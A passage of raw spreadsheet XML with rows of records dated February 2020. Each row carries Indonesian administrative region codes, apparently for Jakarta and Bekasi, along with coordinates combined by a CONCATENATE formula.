      <c r="F816" s="3" t="s">
        <v>3247</v>
      </c>
      <c r="G816" t="s">
        <v>3248</v>
      </c>
      <c r="H816" t="s">
        <v>26</v>
      </c>
      <c r="I816" t="s">
        <v>27</v>
      </c>
      <c r="J816" t="s">
        <v>2248</v>
      </c>
      <c r="L816" t="s">
        <v>3249</v>
      </c>
      <c r="M816">
        <v>3172080003</v>
      </c>
      <c r="N816">
        <v>3172080</v>
      </c>
      <c r="O816">
        <v>3172</v>
      </c>
      <c r="P816">
        <v>31</v>
      </c>
      <c r="Q816" t="s">
        <v>2250</v>
      </c>
      <c r="R816" t="s">
        <v>141</v>
      </c>
      <c r="S816" t="s">
        <v>49</v>
      </c>
      <c r="T816" t="s">
        <v>33</v>
      </c>
      <c r="U816" s="5">
        <v>10694928</v>
      </c>
      <c r="V816" s="5" t="s">
        <v>15210</v>
      </c>
      <c r="W816" s="5">
        <v>-620503</v>
      </c>
      <c r="X816" t="s">
        <v>19010</v>
      </c>
      <c r="Y816" t="str">
        <f t="shared" si="12"/>
        <v>-6.20503,106.94928</v>
      </c>
    </row>
    <row r="817" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A817">
        <v>108387</v>
      </c>
      <c r="B817" s="1">
        <v>43883</v>
      </c>
      <c r="C817">
        <v>1</v>
      </c>
      <c r="D817" t="s">
        <v>22</v>
      </c>
      <c r="E817" t="s">
        <v>23</v>
      </c>
      <c r="F817" t="s">
        <v>3250</v>
      </c>
      <c r="H817" t="s">
        <v>26</v>
      </c>
      <c r="I817" t="s">
        <v>882</v>
      </c>
      <c r="J817" t="s">
        <v>3251</v>
      </c>
      <c r="L817" t="s">
        <v>3252</v>
      </c>
      <c r="M817">
        <v>3172100001</v>
      </c>
      <c r="N817">
        <v>3172100</v>
      </c>
      <c r="O817">
        <v>3172</v>
      </c>
      <c r="P817">
        <v>31</v>
      </c>
      <c r="Q817" t="s">
        <v>3253</v>
      </c>
      <c r="R817" t="s">
        <v>1436</v>
      </c>
      <c r="S817" t="s">
        <v>49</v>
      </c>
      <c r="T817" t="s">
        <v>33</v>
      </c>
      <c r="U817" s="5">
        <v>10685345</v>
      </c>
      <c r="V817" s="5" t="s">
        <v>15211</v>
      </c>
      <c r="W817" s="5">
        <v>-620826</v>
      </c>
      <c r="X817" t="s">
        <v>19011</v>
      </c>
      <c r="Y817" t="str">
        <f t="shared" si="12"/>
        <v>-6.20826,106.85345</v>
      </c>
    </row>
    <row r="818" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A818">
        <v>108388</v>
      </c>
      <c r="B818" s="1">
        <v>43883</v>
      </c>
      <c r="C818">
        <v>1</v>
      </c>
      <c r="D818" t="s">
        <v>22</v>
      </c>
      <c r="E818" t="s">
        <v>23</v>
      </c>
      <c r="F818" t="s">
        <v>3254</v>
      </c>
      <c r="G818" t="s">
        <v>3255</v>
      </c>
      <c r="H818" t="s">
        <v>26</v>
      </c>
      <c r="I818" t="s">
        <v>1809</v>
      </c>
      <c r="J818" t="s">
        <v>2919</v>
      </c>
      <c r="L818" t="s">
        <v>3256</v>
      </c>
      <c r="M818">
        <v>3172090004</v>
      </c>
      <c r="N818">
        <v>3172090</v>
      </c>
      <c r="O818">
        <v>3172</v>
      </c>
      <c r="P818">
        <v>31</v>
      </c>
      <c r="Q818" t="s">
        <v>889</v>
      </c>
      <c r="R818" t="s">
        <v>890</v>
      </c>
      <c r="S818" t="s">
        <v>49</v>
      </c>
      <c r="T818" t="s">
        <v>33</v>
      </c>
      <c r="U818" s="5">
        <v>10689600</v>
      </c>
      <c r="V818" s="5" t="s">
        <v>15212</v>
      </c>
      <c r="W818" s="5">
        <v>-619876</v>
      </c>
      <c r="X818" t="s">
        <v>19012</v>
      </c>
      <c r="Y818" t="str">
        <f t="shared" si="12"/>
        <v>-6.19876,106.89600</v>
      </c>
    </row>
    <row r="819" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A819">
        <v>108389</v>
      </c>
      <c r="B819" s="1">
        <v>43883</v>
      </c>
      <c r="C819">
        <v>1</v>
      </c>
      <c r="D819" t="s">
        <v>22</v>
      </c>
      <c r="E819" t="s">
        <v>23</v>
      </c>
      <c r="F819" t="s">
        <v>3257</v>
      </c>
      <c r="G819" t="s">
        <v>3258</v>
      </c>
      <c r="H819" t="s">
        <v>26</v>
      </c>
      <c r="I819" t="s">
        <v>1953</v>
      </c>
      <c r="J819" t="s">
        <v>3259</v>
      </c>
      <c r="L819" t="s">
        <v>3260</v>
      </c>
      <c r="M819">
        <v>3172100006</v>
      </c>
      <c r="N819">
        <v>3172100</v>
      </c>
      <c r="O819">
        <v>3172</v>
      </c>
      <c r="P819">
        <v>31</v>
      </c>
      <c r="Q819" t="s">
        <v>1435</v>
      </c>
      <c r="R819" t="s">
        <v>1436</v>
      </c>
      <c r="S819" t="s">
        <v>49</v>
      </c>
      <c r="T819" t="s">
        <v>33</v>
      </c>
      <c r="U819" s="5">
        <v>10686990</v>
      </c>
      <c r="V819" s="5" t="s">
        <v>15213</v>
      </c>
      <c r="W819" s="5">
        <v>-619791</v>
      </c>
      <c r="X819" t="s">
        <v>19013</v>
      </c>
      <c r="Y819" t="str">
        <f t="shared" si="12"/>
        <v>-6.19791,106.86990</v>
      </c>
    </row>
    <row r="820" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A820">
        <v>108390</v>
      </c>
      <c r="B820" s="1">
        <v>43883</v>
      </c>
      <c r="C820">
        <v>1</v>
      </c>
      <c r="D820" t="s">
        <v>22</v>
      </c>
      <c r="E820" t="s">
        <v>23</v>
      </c>
      <c r="F820" t="s">
        <v>3261</v>
      </c>
      <c r="G820" t="s">
        <v>3262</v>
      </c>
      <c r="H820" t="s">
        <v>26</v>
      </c>
      <c r="I820" t="s">
        <v>1809</v>
      </c>
      <c r="J820" t="s">
        <v>2498</v>
      </c>
      <c r="L820" t="s">
        <v>3263</v>
      </c>
      <c r="M820">
        <v>3173010003</v>
      </c>
      <c r="N820">
        <v>3173010</v>
      </c>
      <c r="O820">
        <v>3173</v>
      </c>
      <c r="P820">
        <v>31</v>
      </c>
      <c r="Q820" t="s">
        <v>2338</v>
      </c>
      <c r="R820" t="s">
        <v>1481</v>
      </c>
      <c r="S820" t="s">
        <v>62</v>
      </c>
      <c r="T820" t="s">
        <v>33</v>
      </c>
      <c r="U820" s="5">
        <v>10681202</v>
      </c>
      <c r="V820" s="5" t="s">
        <v>15214</v>
      </c>
      <c r="W820" s="5">
        <v>-620764</v>
      </c>
      <c r="X820" t="s">
        <v>19014</v>
      </c>
      <c r="Y820" t="str">
        <f t="shared" si="12"/>
        <v>-6.20764,106.81202</v>
      </c>
    </row>
    <row r="821" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A821">
        <v>108391</v>
      </c>
      <c r="B821" s="1">
        <v>43883</v>
      </c>
      <c r="C821">
        <v>1</v>
      </c>
      <c r="D821" t="s">
        <v>22</v>
      </c>
      <c r="E821" t="s">
        <v>23</v>
      </c>
      <c r="F821" t="s">
        <v>3264</v>
      </c>
      <c r="H821" t="s">
        <v>26</v>
      </c>
      <c r="I821" t="s">
        <v>111</v>
      </c>
      <c r="J821" t="s">
        <v>3265</v>
      </c>
      <c r="L821" t="s">
        <v>3266</v>
      </c>
      <c r="M821">
        <v>3172100005</v>
      </c>
      <c r="N821">
        <v>3172100</v>
      </c>
      <c r="O821">
        <v>3172</v>
      </c>
      <c r="P821">
        <v>31</v>
      </c>
      <c r="Q821" t="s">
        <v>1773</v>
      </c>
      <c r="R821" t="s">
        <v>1436</v>
      </c>
      <c r="S821" t="s">
        <v>49</v>
      </c>
      <c r="T821" t="s">
        <v>33</v>
      </c>
      <c r="U821" s="5">
        <v>10686985</v>
      </c>
      <c r="V821" s="5" t="s">
        <v>15215</v>
      </c>
      <c r="W821" s="5">
        <v>-620433</v>
      </c>
      <c r="X821" t="s">
        <v>19015</v>
      </c>
      <c r="Y821" t="str">
        <f t="shared" si="12"/>
        <v>-6.20433,106.86985</v>
      </c>
    </row>
    <row r="822" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A822">
        <v>108392</v>
      </c>
      <c r="B822" s="1">
        <v>43883</v>
      </c>
      <c r="C822">
        <v>1</v>
      </c>
      <c r="D822" t="s">
        <v>22</v>
      </c>
      <c r="E822" t="s">
        <v>23</v>
      </c>
      <c r="F822" t="s">
        <v>3267</v>
      </c>
      <c r="G822" t="s">
        <v>3268</v>
      </c>
      <c r="H822" t="s">
        <v>26</v>
      </c>
      <c r="I822" t="s">
        <v>1909</v>
      </c>
      <c r="J822" t="s">
        <v>2352</v>
      </c>
      <c r="L822" t="s">
        <v>3269</v>
      </c>
      <c r="M822">
        <v>3173050002</v>
      </c>
      <c r="N822">
        <v>3173050</v>
      </c>
      <c r="O822">
        <v>3173</v>
      </c>
      <c r="P822">
        <v>31</v>
      </c>
      <c r="Q822" t="s">
        <v>588</v>
      </c>
      <c r="R822" t="s">
        <v>589</v>
      </c>
      <c r="S822" t="s">
        <v>62</v>
      </c>
      <c r="T822" t="s">
        <v>33</v>
      </c>
      <c r="U822" s="5">
        <v>10687422</v>
      </c>
      <c r="V822" s="5" t="s">
        <v>15216</v>
      </c>
      <c r="W822" s="5">
        <v>-617532</v>
      </c>
      <c r="X822" t="s">
        <v>19016</v>
      </c>
      <c r="Y822" t="str">
        <f t="shared" si="12"/>
        <v>-6.17532,106.87422</v>
      </c>
    </row>
    <row r="823" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A823">
        <v>108393</v>
      </c>
      <c r="B823" s="1">
        <v>43883</v>
      </c>
      <c r="C823">
        <v>1</v>
      </c>
      <c r="D823" t="s">
        <v>22</v>
      </c>
      <c r="E823" t="s">
        <v>23</v>
      </c>
      <c r="F823" t="s">
        <v>3270</v>
      </c>
      <c r="G823" t="s">
        <v>3271</v>
      </c>
      <c r="H823" t="s">
        <v>26</v>
      </c>
      <c r="I823" t="s">
        <v>961</v>
      </c>
      <c r="J823" t="s">
        <v>3184</v>
      </c>
      <c r="L823" t="s">
        <v>3272</v>
      </c>
      <c r="M823">
        <v>3172070007</v>
      </c>
      <c r="N823">
        <v>3172070</v>
      </c>
      <c r="O823">
        <v>3172</v>
      </c>
      <c r="P823">
        <v>31</v>
      </c>
      <c r="Q823" t="s">
        <v>3186</v>
      </c>
      <c r="R823" t="s">
        <v>128</v>
      </c>
      <c r="S823" t="s">
        <v>49</v>
      </c>
      <c r="T823" t="s">
        <v>33</v>
      </c>
      <c r="U823" s="5">
        <v>10690292</v>
      </c>
      <c r="V823" s="5" t="s">
        <v>15217</v>
      </c>
      <c r="W823" s="5">
        <v>-621728</v>
      </c>
      <c r="X823" t="s">
        <v>19017</v>
      </c>
      <c r="Y823" t="str">
        <f t="shared" si="12"/>
        <v>-6.21728,106.90292</v>
      </c>
    </row>
    <row r="824" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A824">
        <v>108394</v>
      </c>
      <c r="B824" s="1">
        <v>43883</v>
      </c>
      <c r="C824">
        <v>1</v>
      </c>
      <c r="D824" t="s">
        <v>22</v>
      </c>
      <c r="E824" t="s">
        <v>23</v>
      </c>
      <c r="F824" t="s">
        <v>3273</v>
      </c>
      <c r="G824" t="s">
        <v>3274</v>
      </c>
      <c r="H824" t="s">
        <v>26</v>
      </c>
      <c r="I824" t="s">
        <v>3275</v>
      </c>
      <c r="J824" t="s">
        <v>3212</v>
      </c>
      <c r="L824" t="s">
        <v>3276</v>
      </c>
      <c r="M824">
        <v>3173050003</v>
      </c>
      <c r="N824">
        <v>3173050</v>
      </c>
      <c r="O824">
        <v>3173</v>
      </c>
      <c r="P824">
        <v>31</v>
      </c>
      <c r="Q824" t="s">
        <v>2333</v>
      </c>
      <c r="R824" t="s">
        <v>589</v>
      </c>
      <c r="S824" t="s">
        <v>62</v>
      </c>
      <c r="T824" t="s">
        <v>33</v>
      </c>
      <c r="U824" s="5">
        <v>10686920</v>
      </c>
      <c r="V824" s="5" t="s">
        <v>15218</v>
      </c>
      <c r="W824" s="5">
        <v>-618555</v>
      </c>
      <c r="X824" t="s">
        <v>19018</v>
      </c>
      <c r="Y824" t="str">
        <f t="shared" si="12"/>
        <v>-6.18555,106.86920</v>
      </c>
    </row>
    <row r="825" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A825">
        <v>108395</v>
      </c>
      <c r="B825" s="1">
        <v>43883</v>
      </c>
      <c r="C825">
        <v>1</v>
      </c>
      <c r="D825" t="s">
        <v>22</v>
      </c>
      <c r="E825" t="s">
        <v>23</v>
      </c>
      <c r="F825" t="s">
        <v>3277</v>
      </c>
      <c r="H825" t="s">
        <v>26</v>
      </c>
      <c r="I825" t="s">
        <v>784</v>
      </c>
      <c r="J825" t="s">
        <v>3278</v>
      </c>
      <c r="L825" t="s">
        <v>3279</v>
      </c>
      <c r="M825">
        <v>3172070007</v>
      </c>
      <c r="N825">
        <v>3172070</v>
      </c>
      <c r="O825">
        <v>3172</v>
      </c>
      <c r="P825">
        <v>31</v>
      </c>
      <c r="Q825" t="s">
        <v>3186</v>
      </c>
      <c r="R825" t="s">
        <v>128</v>
      </c>
      <c r="S825" t="s">
        <v>49</v>
      </c>
      <c r="T825" t="s">
        <v>33</v>
      </c>
      <c r="U825" s="5">
        <v>10689654</v>
      </c>
      <c r="V825" s="5" t="s">
        <v>15219</v>
      </c>
      <c r="W825" s="5">
        <v>-621812</v>
      </c>
      <c r="X825" t="s">
        <v>19019</v>
      </c>
      <c r="Y825" t="str">
        <f t="shared" si="12"/>
        <v>-6.21812,106.89654</v>
      </c>
    </row>
    <row r="826" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A826">
        <v>108396</v>
      </c>
      <c r="B826" s="1">
        <v>43883</v>
      </c>
      <c r="C826">
        <v>1</v>
      </c>
      <c r="D826" t="s">
        <v>22</v>
      </c>
      <c r="E826" t="s">
        <v>23</v>
      </c>
      <c r="F826" t="s">
        <v>3280</v>
      </c>
      <c r="G826" t="s">
        <v>3281</v>
      </c>
      <c r="H826" t="s">
        <v>26</v>
      </c>
      <c r="I826" t="s">
        <v>511</v>
      </c>
      <c r="J826" t="s">
        <v>3282</v>
      </c>
      <c r="L826" t="s">
        <v>3283</v>
      </c>
      <c r="M826">
        <v>3172090002</v>
      </c>
      <c r="N826">
        <v>3172090</v>
      </c>
      <c r="O826">
        <v>3172</v>
      </c>
      <c r="P826">
        <v>31</v>
      </c>
      <c r="Q826" t="s">
        <v>2931</v>
      </c>
      <c r="R826" t="s">
        <v>890</v>
      </c>
      <c r="S826" t="s">
        <v>49</v>
      </c>
      <c r="T826" t="s">
        <v>33</v>
      </c>
      <c r="U826" s="5">
        <v>10689622</v>
      </c>
      <c r="V826" s="5" t="s">
        <v>15220</v>
      </c>
      <c r="W826" s="5">
        <v>-620518</v>
      </c>
      <c r="X826" t="s">
        <v>19020</v>
      </c>
      <c r="Y826" t="str">
        <f t="shared" si="12"/>
        <v>-6.20518,106.89622</v>
      </c>
    </row>
    <row r="827" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A827">
        <v>108397</v>
      </c>
      <c r="B827" s="1">
        <v>43883</v>
      </c>
      <c r="C827">
        <v>1</v>
      </c>
      <c r="D827" t="s">
        <v>22</v>
      </c>
      <c r="E827" t="s">
        <v>23</v>
      </c>
      <c r="F827" t="s">
        <v>3284</v>
      </c>
      <c r="G827" t="s">
        <v>3285</v>
      </c>
      <c r="H827" t="s">
        <v>26</v>
      </c>
      <c r="I827" t="s">
        <v>1651</v>
      </c>
      <c r="J827" t="s">
        <v>3232</v>
      </c>
      <c r="L827" t="s">
        <v>3286</v>
      </c>
      <c r="M827">
        <v>3172090001</v>
      </c>
      <c r="N827">
        <v>3172090</v>
      </c>
      <c r="O827">
        <v>3172</v>
      </c>
      <c r="P827">
        <v>31</v>
      </c>
      <c r="Q827" t="s">
        <v>2681</v>
      </c>
      <c r="R827" t="s">
        <v>890</v>
      </c>
      <c r="S827" t="s">
        <v>49</v>
      </c>
      <c r="T827" t="s">
        <v>33</v>
      </c>
      <c r="U827" s="5">
        <v>10687684</v>
      </c>
      <c r="V827" s="5" t="s">
        <v>15221</v>
      </c>
      <c r="W827" s="5">
        <v>-620907</v>
      </c>
      <c r="X827" t="s">
        <v>19021</v>
      </c>
      <c r="Y827" t="str">
        <f t="shared" si="12"/>
        <v>-6.20907,106.87684</v>
      </c>
    </row>
    <row r="828" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A828">
        <v>108398</v>
      </c>
      <c r="B828" s="1">
        <v>43883</v>
      </c>
      <c r="C828">
        <v>1</v>
      </c>
      <c r="D828" t="s">
        <v>22</v>
      </c>
      <c r="E828" t="s">
        <v>23</v>
      </c>
      <c r="F828" t="s">
        <v>3287</v>
      </c>
      <c r="G828" t="s">
        <v>3288</v>
      </c>
      <c r="H828" t="s">
        <v>26</v>
      </c>
      <c r="I828" t="s">
        <v>457</v>
      </c>
      <c r="J828" t="s">
        <v>3066</v>
      </c>
      <c r="M828">
        <v>3173020001</v>
      </c>
      <c r="N828">
        <v>3173020</v>
      </c>
      <c r="O828">
        <v>3173</v>
      </c>
      <c r="P828">
        <v>31</v>
      </c>
      <c r="Q828" t="s">
        <v>179</v>
      </c>
      <c r="R828" t="s">
        <v>179</v>
      </c>
      <c r="S828" t="s">
        <v>62</v>
      </c>
      <c r="T828" t="s">
        <v>33</v>
      </c>
      <c r="U828" s="5">
        <v>10683408</v>
      </c>
      <c r="V828" s="5" t="s">
        <v>15222</v>
      </c>
      <c r="W828" s="5">
        <v>-619876</v>
      </c>
      <c r="X828" t="s">
        <v>19012</v>
      </c>
      <c r="Y828" t="str">
        <f t="shared" si="12"/>
        <v>-6.19876,106.83408</v>
      </c>
    </row>
    <row r="829" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A829">
        <v>108399</v>
      </c>
      <c r="B829" s="1">
        <v>43883</v>
      </c>
      <c r="C829">
        <v>1</v>
      </c>
      <c r="D829" t="s">
        <v>22</v>
      </c>
      <c r="E829" t="s">
        <v>23</v>
      </c>
      <c r="F829" t="s">
        <v>3289</v>
      </c>
      <c r="G829" t="s">
        <v>3290</v>
      </c>
      <c r="H829" t="s">
        <v>26</v>
      </c>
      <c r="I829" t="s">
        <v>974</v>
      </c>
      <c r="J829" t="s">
        <v>3291</v>
      </c>
      <c r="L829" t="s">
        <v>3292</v>
      </c>
      <c r="M829">
        <v>3172100004</v>
      </c>
      <c r="N829">
        <v>3172100</v>
      </c>
      <c r="O829">
        <v>3172</v>
      </c>
      <c r="P829">
        <v>31</v>
      </c>
      <c r="Q829" t="s">
        <v>3293</v>
      </c>
      <c r="R829" t="s">
        <v>1436</v>
      </c>
      <c r="S829" t="s">
        <v>49</v>
      </c>
      <c r="T829" t="s">
        <v>33</v>
      </c>
      <c r="U829" s="5">
        <v>10686057</v>
      </c>
      <c r="V829" s="5" t="s">
        <v>15223</v>
      </c>
      <c r="W829" s="5">
        <v>-619948</v>
      </c>
      <c r="X829" t="s">
        <v>19022</v>
      </c>
      <c r="Y829" t="str">
        <f t="shared" si="12"/>
        <v>-6.19948,106.86057</v>
      </c>
    </row>
    <row r="830" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A830">
        <v>108400</v>
      </c>
      <c r="B830" s="1">
        <v>43883</v>
      </c>
      <c r="C830">
        <v>1</v>
      </c>
      <c r="D830" t="s">
        <v>22</v>
      </c>
      <c r="E830" t="s">
        <v>23</v>
      </c>
      <c r="F830" t="s">
        <v>3294</v>
      </c>
      <c r="G830" t="s">
        <v>3295</v>
      </c>
      <c r="H830" t="s">
        <v>26</v>
      </c>
      <c r="I830" t="s">
        <v>974</v>
      </c>
      <c r="J830" t="s">
        <v>2479</v>
      </c>
      <c r="M830">
        <v>3172080005</v>
      </c>
      <c r="N830">
        <v>3172080</v>
      </c>
      <c r="O830">
        <v>3172</v>
      </c>
      <c r="P830">
        <v>31</v>
      </c>
      <c r="Q830" t="s">
        <v>140</v>
      </c>
      <c r="R830" t="s">
        <v>141</v>
      </c>
      <c r="S830" t="s">
        <v>49</v>
      </c>
      <c r="T830" t="s">
        <v>33</v>
      </c>
      <c r="U830" s="5">
        <v>10694659</v>
      </c>
      <c r="V830" s="5" t="s">
        <v>15224</v>
      </c>
      <c r="W830" s="5">
        <v>-618865</v>
      </c>
      <c r="X830" t="s">
        <v>19023</v>
      </c>
      <c r="Y830" t="str">
        <f t="shared" si="12"/>
        <v>-6.18865,106.94659</v>
      </c>
    </row>
    <row r="831" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A831">
        <v>108401</v>
      </c>
      <c r="B831" s="1">
        <v>43883</v>
      </c>
      <c r="C831">
        <v>1</v>
      </c>
      <c r="D831" t="s">
        <v>22</v>
      </c>
      <c r="E831" t="s">
        <v>23</v>
      </c>
      <c r="F831" t="s">
        <v>3296</v>
      </c>
      <c r="H831" t="s">
        <v>26</v>
      </c>
      <c r="I831" t="s">
        <v>166</v>
      </c>
      <c r="J831" t="s">
        <v>2627</v>
      </c>
      <c r="L831" t="s">
        <v>3297</v>
      </c>
      <c r="M831">
        <v>3275061004</v>
      </c>
      <c r="N831">
        <v>3275061</v>
      </c>
      <c r="O831">
        <v>3275</v>
      </c>
      <c r="P831">
        <v>32</v>
      </c>
      <c r="Q831" t="s">
        <v>39</v>
      </c>
      <c r="R831" t="s">
        <v>40</v>
      </c>
      <c r="S831" t="s">
        <v>41</v>
      </c>
      <c r="T831" t="s">
        <v>42</v>
      </c>
      <c r="U831" s="5">
        <v>10698971</v>
      </c>
      <c r="V831" s="5" t="s">
        <v>15225</v>
      </c>
      <c r="W831" s="5">
        <v>-617284</v>
      </c>
      <c r="X831" t="s">
        <v>19024</v>
      </c>
      <c r="Y831" t="str">
        <f t="shared" si="12"/>
        <v>-6.17284,106.98971</v>
      </c>
    </row>
    <row r="832" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A832">
        <v>108402</v>
      </c>
      <c r="B832" s="1">
        <v>43883</v>
      </c>
      <c r="C832">
        <v>1</v>
      </c>
      <c r="D832" t="s">
        <v>22</v>
      </c>
      <c r="E832" t="s">
        <v>23</v>
      </c>
      <c r="F832" t="s">
        <v>3298</v>
      </c>
      <c r="G832" t="s">
        <v>3299</v>
      </c>
      <c r="H832" t="s">
        <v>26</v>
      </c>
      <c r="I832" t="s">
        <v>1651</v>
      </c>
      <c r="J832" t="s">
        <v>3300</v>
      </c>
      <c r="M832">
        <v>3171020005</v>
      </c>
      <c r="N832">
        <v>3171020</v>
      </c>
      <c r="O832">
        <v>3171</v>
      </c>
      <c r="P832">
        <v>31</v>
      </c>
      <c r="Q832" t="s">
        <v>483</v>
      </c>
      <c r="R832" t="s">
        <v>484</v>
      </c>
      <c r="S832" t="s">
        <v>108</v>
      </c>
      <c r="T832" t="s">
        <v>33</v>
      </c>
      <c r="U832" s="5">
        <v>10683283</v>
      </c>
      <c r="V832" s="5" t="s">
        <v>15226</v>
      </c>
      <c r="W832" s="5">
        <v>-629085</v>
      </c>
      <c r="X832" t="s">
        <v>19025</v>
      </c>
      <c r="Y832" t="str">
        <f t="shared" si="12"/>
        <v>-6.29085,106.83283</v>
      </c>
    </row>
    <row r="833" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A833">
        <v>108403</v>
      </c>
      <c r="B833" s="1">
        <v>43883</v>
      </c>
      <c r="C833">
        <v>1</v>
      </c>
      <c r="D833" t="s">
        <v>22</v>
      </c>
      <c r="E833" t="s">
        <v>23</v>
      </c>
      <c r="F833" t="s">
        <v>3301</v>
      </c>
      <c r="G833" t="s">
        <v>3302</v>
      </c>
      <c r="H833" t="s">
        <v>26</v>
      </c>
      <c r="I833" t="s">
        <v>1359</v>
      </c>
      <c r="J833" t="s">
        <v>3180</v>
      </c>
      <c r="L833" t="s">
        <v>3303</v>
      </c>
      <c r="M833">
        <v>3172060008</v>
      </c>
      <c r="N833">
        <v>3172060</v>
      </c>
      <c r="O833">
        <v>3172</v>
      </c>
      <c r="P833">
        <v>31</v>
      </c>
      <c r="Q833" t="s">
        <v>1096</v>
      </c>
      <c r="R833" t="s">
        <v>48</v>
      </c>
      <c r="S833" t="s">
        <v>49</v>
      </c>
      <c r="T833" t="s">
        <v>33</v>
      </c>
      <c r="U833" s="5">
        <v>10685760</v>
      </c>
      <c r="V833" s="5" t="s">
        <v>15227</v>
      </c>
      <c r="W833" s="5">
        <v>-621444</v>
      </c>
      <c r="X833" t="s">
        <v>19026</v>
      </c>
      <c r="Y833" t="str">
        <f t="shared" si="12"/>
        <v>-6.21444,106.85760</v>
      </c>
    </row>
    <row r="834" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A834">
        <v>108404</v>
      </c>
      <c r="B834" s="1">
        <v>43883</v>
      </c>
      <c r="C834">
        <v>1</v>
      </c>
      <c r="D834" t="s">
        <v>22</v>
      </c>
      <c r="E834" t="s">
        <v>23</v>
      </c>
      <c r="F834" t="s">
        <v>3304</v>
      </c>
      <c r="G834" t="s">
        <v>3305</v>
      </c>
      <c r="H834" t="s">
        <v>26</v>
      </c>
      <c r="I834" t="s">
        <v>166</v>
      </c>
      <c r="J834" t="s">
        <v>3259</v>
      </c>
      <c r="M834">
        <v>3172100006</v>
      </c>
      <c r="N834">
        <v>3172100</v>
      </c>
      <c r="O834">
        <v>3172</v>
      </c>
      <c r="P834">
        <v>31</v>
      </c>
      <c r="Q834" t="s">
        <v>1435</v>
      </c>
      <c r="R834" t="s">
        <v>1436</v>
      </c>
      <c r="S834" t="s">
        <v>49</v>
      </c>
      <c r="T834" t="s">
        <v>33</v>
      </c>
      <c r="U834" s="5">
        <v>10687077</v>
      </c>
      <c r="V834" s="5" t="s">
        <v>15228</v>
      </c>
      <c r="W834" s="5">
        <v>-619745</v>
      </c>
      <c r="X834" t="s">
        <v>19027</v>
      </c>
      <c r="Y834" t="str">
        <f t="shared" si="12"/>
        <v>-6.19745,106.87077</v>
      </c>
    </row>
    <row r="835" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A835">
        <v>108405</v>
      </c>
      <c r="B835" s="1">
        <v>43883</v>
      </c>
      <c r="C835">
        <v>1</v>
      </c>
      <c r="D835" t="s">
        <v>22</v>
      </c>
      <c r="E835" t="s">
        <v>23</v>
      </c>
      <c r="F835" t="s">
        <v>3306</v>
      </c>
      <c r="G835" t="s">
        <v>3307</v>
      </c>
      <c r="H835" t="s">
        <v>26</v>
      </c>
      <c r="I835" t="s">
        <v>65</v>
      </c>
      <c r="J835" t="s">
        <v>2627</v>
      </c>
      <c r="L835" t="s">
        <v>3308</v>
      </c>
      <c r="M835">
        <v>3275070002</v>
      </c>
      <c r="N835">
        <v>3275070</v>
      </c>
      <c r="O835">
        <v>3275</v>
      </c>
      <c r="P835">
        <v>32</v>
      </c>
      <c r="Q835" t="s">
        <v>3309</v>
      </c>
      <c r="R835" t="s">
        <v>3310</v>
      </c>
      <c r="S835" t="s">
        <v>41</v>
      </c>
      <c r="T835" t="s">
        <v>42</v>
      </c>
      <c r="U835" s="5">
        <v>10700609</v>
      </c>
      <c r="V835" s="5" t="s">
        <v>15229</v>
      </c>
      <c r="W835" s="5">
        <v>-617509</v>
      </c>
      <c r="X835" t="s">
        <v>19028</v>
      </c>
      <c r="Y835" t="str">
        <f t="shared" ref="Y835:Y898" si="13">CONCATENATE(X835,",",V835)</f>
        <v>-6.17509,107.00609</v>
      </c>
    </row>
    <row r="836" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A836">
        <v>108406</v>
      </c>
      <c r="B836" s="1">
        <v>43883</v>
      </c>
      <c r="C836">
        <v>1</v>
      </c>
      <c r="D836" t="s">
        <v>22</v>
      </c>
      <c r="E836" t="s">
        <v>23</v>
      </c>
      <c r="F836" t="s">
        <v>3311</v>
      </c>
      <c r="G836" t="s">
        <v>3312</v>
      </c>
      <c r="H836" t="s">
        <v>26</v>
      </c>
      <c r="I836" t="s">
        <v>974</v>
      </c>
      <c r="J836" t="s">
        <v>3313</v>
      </c>
      <c r="L836" t="s">
        <v>3314</v>
      </c>
      <c r="M836">
        <v>3172060005</v>
      </c>
      <c r="N836">
        <v>3172060</v>
      </c>
      <c r="O836">
        <v>3172</v>
      </c>
      <c r="P836">
        <v>31</v>
      </c>
      <c r="Q836" t="s">
        <v>1019</v>
      </c>
      <c r="R836" t="s">
        <v>48</v>
      </c>
      <c r="S836" t="s">
        <v>49</v>
      </c>
      <c r="T836" t="s">
        <v>33</v>
      </c>
      <c r="U836" s="5">
        <v>10688021</v>
      </c>
      <c r="V836" s="5" t="s">
        <v>15230</v>
      </c>
      <c r="W836" s="5">
        <v>-621728</v>
      </c>
      <c r="X836" t="s">
        <v>19017</v>
      </c>
      <c r="Y836" t="str">
        <f t="shared" si="13"/>
        <v>-6.21728,106.88021</v>
      </c>
    </row>
    <row r="837" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A837">
        <v>108407</v>
      </c>
      <c r="B837" s="1">
        <v>43883</v>
      </c>
      <c r="C837">
        <v>1</v>
      </c>
      <c r="D837" t="s">
        <v>22</v>
      </c>
      <c r="E837" t="s">
        <v>23</v>
      </c>
      <c r="F837" t="s">
        <v>3315</v>
      </c>
      <c r="G837" t="s">
        <v>3316</v>
      </c>
      <c r="H837" t="s">
        <v>26</v>
      </c>
      <c r="I837" t="s">
        <v>1953</v>
      </c>
      <c r="J837" t="s">
        <v>550</v>
      </c>
      <c r="L837" t="s">
        <v>250</v>
      </c>
      <c r="M837">
        <v>3172040003</v>
      </c>
      <c r="N837">
        <v>3172040</v>
      </c>
      <c r="O837">
        <v>3172</v>
      </c>
      <c r="P837">
        <v>31</v>
      </c>
      <c r="Q837" t="s">
        <v>552</v>
      </c>
      <c r="R837" t="s">
        <v>281</v>
